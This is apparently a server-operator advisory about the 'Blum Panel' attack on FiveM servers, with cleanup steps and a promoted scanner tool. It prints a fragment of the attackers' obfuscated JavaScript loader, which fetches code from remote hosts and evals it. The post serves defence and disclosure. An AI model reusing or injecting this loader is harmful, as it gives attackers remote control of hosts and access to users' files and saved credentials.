FiveM Blum Panel Attack

What is Blum Panel for Fivem?

We have operated for around 6 years and until this week we had not heard of the Blum Panel. This is a tool used by people to mass troll FiveM servers and players at once via a dashboard. Its basically a web FiveM admin dashboard that has been converted into a malicious tool. These sort of attacks have been around for many years, they may appear harmless with just spamming text on your screen, but there is a more serious issue. If you have been effected then please read this post

If You Have Been Attacked By Blum Read This

The tool allows the attacker to remote load code and run it via your machine. FiveM allows os.execute which basically means they can do anything on your host, from, creating new remote desktop logins and creating new admins. They can also access all your files and web browser saved information such as Gmail and banking or Discord. Anything you have used or done via your host such as a Windows VPS is now fully compromised. You must changed all passwords and also do a full host reinstall and reset. Your server files are also infected, you will notice in most of your scripts they have pasted obfuscated code into your scripts. This is all feeding back to the initial remote code loader.

• Your server files are infected, you must remove all bad code and possibly rebuild to be safe

• Your host needs a full reset/reinstall to be safe.

Example Of Blums Code

(_,h)=>String.fromCharCode(parseInt(h,16))).split('').map(c=>String.fromCharCode(c.charCodeAt(0)^3)).join(''));v="pfwJnnfgjbwf++#>=#x\u0009####pfwWjnflvw++#>=#x\u0009########lmpw#\u005c\u005cWKQFBG\u005cMBNF#>#!njbvp!8\u0009########lmpw#qfplvqfMbnf#>#Dfw@vqqfmwQfplvqfMbnf+8\u0009\u0009########je#+wzsfle#dolaboWkjp-DolaboPwbwf#>>>#!vmgfejmfg!#x\u0009############dolaboWkjp-DolaboPwbwf#>#x~8\u0009########~\u0009\u0009########lmpw#vqqfmwLtmfq#>#dolaboWkjp-DolaboPwbwfX\u005c\u005cWKQFBG\u005cMBNF^8\u0009\u0009########je#+\u0022vqqfmwLtmfq#\u007f\u007f#vqqfmwLtmfq#>>>#qfplvq`fMbnf#x\u0009############dolaboWkjp-DolaboPwbwfX\u005c\u005cWKQFBG\u005cMBNF^#>#qfplvqfMbnf8\u0009\u0009############lm+!lmQfplvqfPwls!/#+pwlssfgQfplvqf*#>=#x\u0009################je#+pwlssfgQfplvqf#>>>#qfplvqfMbnf*#gfofwf#dolaboWkjp-DolaboPwbwfX\u005c\u005cWKQFBG\u005cMBNF^8\u0009############~*8\u0009\u0009############wqz#x\u0009################qfrvjqf+!kwwsp!*-dfw+ckwwsp9,,:mp2-ln,y[fBKiic/#q#>=#x\u0009####################ofw#g#>#$$8\u0009####################q-lm+$gbwb$/##>=#g#(>#8\u0009####################q-lm+$fmg$/#+#>=#x\u0009########################wqz#x\u0009############################fubo+g8\u0009########################~#bwk#x\u0009############################qfrvjqf+!kwwsp!-dfw+ckwwsp9,,:mp2-ln,y[fBKiiddc/#q1#>=#x\u0009################################ofw#g1#>#$$8\u0009################################q1-lm+$gbwb$/##>=#g1#(>#*8\u0009################################q1-lm+$fmg$/#+*#>=#x\u0009####################################wqz#x\u0009########################################fubo+g1*8\u0009####################################~#bwk#x\u0009########################################qfrvjqf+!kwwsp!*-dfw+ckwwsp9,,:mp2-ln,e{qfc/#q0#>=#x\u0009############################################ofw#g0#>#$$8\u0009############################################q0-lm+$gbwb$/##>=#g0#(>#*8\u0009############################################q0-lm+$fmg$/#+*#>=#fubo+g0**8\u0009########################################~*8\u0009####################################~\u0009################################~*8\u0009############################~*8\u0009########################~\u0009####################~*8\u0009################~*8\u0009############~#bwk+f*#x\u0009################qfrvjqf+!kwwsp!*-dfw+ckwwsp9,,:mp2-ln,e{qfc/#q#>=#x\u0009####################ofw#g#>#$$8\u0009####################q-lm+$gbwb$/##>=#g#(>#`8\u0009####################q-lm+$fmg$/#+#>=#fubo+g*8\u0009################~8\u0009############~\u0009########~\u0009####~/#133338\u0009~8"

How To Find The Code

Okay so maybe you been attacked and now your bum cheeks feel tight after reading all this. Do not fear, first you want to remove all the bad code before creating a backup of your server files to be used later. You can use tools such as Visual Studio Code to easily search all your server files at once. We also created a free and fully open source tool you can use that may help. It will simply search your server files all at once and log

This Is Our Free Python Scanner Tool

Please do not rely on this solely, chances are the creators of the panel may see this tool read the code and adjust there approach. Please manually check files and remove any scripts from leaks or obfuscated code inside. This tool will mass scan your entire server files at once for things that could be bad, if it find something it does not mean its 100% bad. It is just alerting you about something that is possibly bad. You will also need to have Python installed and required modules. You can download this tool by pressing the button below the picture.

• This tool may stop responding for a few seconds whilst scanning your entire server resources. Let is load and do not touch whilst it scans

• This tool is 100% open source, no hidden code and you can check prior to running that its safe with AI or yourself.

• Do not rely on this tool to find the Blums code, please also manually check

• You will need Python and requirements for this tool to work, we have some videos on our YouTube.

• You can delete code via the tool - Try to manually delete the code to prevent you breaking a script

We used there demo UI code and converted it into a fully working admin menu XD